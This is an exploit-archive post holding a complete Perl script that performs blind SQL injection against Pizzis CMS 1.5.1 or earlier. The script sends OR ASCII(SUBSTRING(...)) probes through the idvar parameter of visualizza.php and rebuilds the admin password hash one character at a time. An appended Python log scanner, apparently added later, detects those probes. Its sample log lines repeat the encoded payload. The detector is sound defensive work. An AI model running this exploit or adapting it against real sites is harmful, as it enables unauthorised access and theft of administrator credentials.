Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit
Source: http://darkjoker.net23.net  Author: darkjoker  Published: 2009-01-09
--+++=============================================================+++--
--+++====== Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit ======+++--
--+++=============================================================+++--


#!/usr/bin/perl
# Boolean-based blind SQL injection in Pizzis CMS <= 1.5.1: the idvar parameter of
# visualizza.php reaches a SQL statement without sanitisation, so the script asks one
# true/false question per character of the admin password hash and reads the answer
# from whether the page renders its <h4> element.

use strict;
use warnings;
use IO::Socket;

sub usage {
    die
        "\n[+] Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit".
        "\n[+] Author: darkjoker".
        "\n[+] Site  : http://darkjoker.net23.net".
        "\n[+] Usage : perl $0 <hostname> <path> <username>".
        "\n[+] Ex.   : perl $0 localhost /pizziscms admin".
        "\n[+] Greetz: my girlfriend, she has no idea about what is it <3".
        "\n\n";
}

# Build the URL-encoded idvar value: a non-existent id (98765) OR'ed with a
# condition on the ASCII code of one character of the stored password.
sub query {
    my ($user, $chr, $pos) = @_;
    my $query = "98765 OR ASCII(SUBSTRING((SELECT pass FROM pizziscms_admin WHERE user  = '${user}'),${pos},1))=${chr}";
    $query =~ s/ /%20/g;
    $query =~ s/'/%27/g;
    return $query;
}

# Send one probe over plain HTTP; return 1 when the response contains an <h4>
# element (condition true), 0 when it does not (condition false or no match).
sub exploit {
    my ($hostname, $path, $user, $chr, $pos) = @_;
    $chr = ord($chr);

    my $sock = IO::Socket::INET->new(
        PeerHost => $hostname,
        PeerPort => 80,
        Proto    => "tcp",
    ) or die $!;

    my $query = query($user, $chr, $pos);
    my $request = "GET ${path}/visualizza.php?idvar=${query} HTTP/1.1\r\n".
                  "Host: ${hostname}\r\n".
                  "Connection: Close\r\n\r\n";

    print $sock $request;

    my $reply = '';
    while (<$sock>)
    {
        $reply .= $_;
    }
    close($sock);

    # Collapse all whitespace to spaces so the regex can match across lines.
    $reply =~ s/\s/ /g;

    # The <h4> element is the oracle; capture into a lexical so an unmatched
    # response yields undef instead of a stale $1.
    my ($match) = $reply =~ /<h4>(.+)\/h4>/;
    return (defined $match && length($match) > 1) ? 1 : 0;
}

usage() if scalar(@ARGV) != 3;

my ($hostname, $path, $user) = @ARGV;

# Candidate alphabet for each position of the 32-character hash (positions 1..32).
my @key = split('', 'abcdefghijklmnopqrstuvwxyz0123456789');
my $pos = 1;
my $chr = 0;

$| = 1;    # unbuffered STDOUT so each recovered character prints immediately
print "[+] Password: ";
while ($pos <= 32)
{
    if (exploit($hostname, $path, $user, $key[$chr], $pos))
    {
        print $key[$chr];
        $chr = -1;    # restart the alphabet for the next position
        $pos++;
    }
    $chr++;
    # No candidate matched at this position: stop instead of looping forever.
    die "\n[-] No candidate matched at position $pos\n" if $chr > $#key;
}

print "\n";
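As a defender-side counterpart, an added example (not part of the original post or the CMS) that scans constructed Apache-style access-log lines for the request shape this exploit emits and flags sources that repeatedly send boolean-oracle probes to visualizza.php. The log lines, IP addresses and threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format). The probe lines carry a
# SQL tail where an integer id is expected; the differing response sizes (412 vs
# 2310) are the true/false oracle the exploit above reads from the <h4> element.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jan/2009:10:00:01 +0000] "GET /pizziscms/visualizza.php?idvar=12 HTTP/1.1" 200 2310
10.0.0.9 - - [09/Jan/2009:10:00:02 +0000] "GET /pizziscms/visualizza.php?idvar=98765%20OR%20ASCII(SUBSTRING((SELECT%20pass%20FROM%20pizziscms_admin%20WHERE%20user%20%20=%20%27admin%27),1,1))=97 HTTP/1.1" 200 412
10.0.0.9 - - [09/Jan/2009:10:00:02 +0000] "GET /pizziscms/visualizza.php?idvar=98765%20OR%20ASCII(SUBSTRING((SELECT%20pass%20FROM%20pizziscms_admin%20WHERE%20user%20%20=%20%27admin%27),1,1))=98 HTTP/1.1" 200 412
10.0.0.9 - - [09/Jan/2009:10:00:03 +0000] "GET /pizziscms/visualizza.php?idvar=98765%20OR%20ASCII(SUBSTRING((SELECT%20pass%20FROM%20pizziscms_admin%20WHERE%20user%20%20=%20%27admin%27),2,1))=53 HTTP/1.1" 200 2310
10.0.0.7 - - [09/Jan/2009:10:00:04 +0000] "GET /pizziscms/index.php HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d+) (?P<size>\d+)')
# Fingerprint of the character-by-character oracle: OR ... ASCII(SUBSTRING(
PROBE_RE = re.compile(r'\bOR\b.*\bASCII\s*\(\s*SUBSTRING\s*\(', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_probe(uri):
    """True when idvar of visualizza.php is not a plain integer and carries the oracle expression."""
    path, sep, qs = uri.partition('?')
    if not path.endswith('/visualizza.php') or not sep:
        return False
    params = dict(p.split('=', 1) for p in qs.split('&') if '=' in p)
    idvar = unquote_plus(params.get('idvar', ''))   # decode %20, %27, ...
    if idvar.isdigit():
        return False                                 # legitimate numeric id
    return PROBE_RE.search(idvar) is not None


def detect_probing(log_text, threshold=2):
    """Count oracle probes per source IP; return {ip: count} for sources at or above threshold."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec['method'] == 'GET' and is_probe(rec['uri']):
            counts[rec['ip']] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Because the real extraction needs one request per candidate character, even a low per-source threshold separates the probing client from ordinary visitors, and the same check works as a WAF rule: reject any idvar that is not a plain integer.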
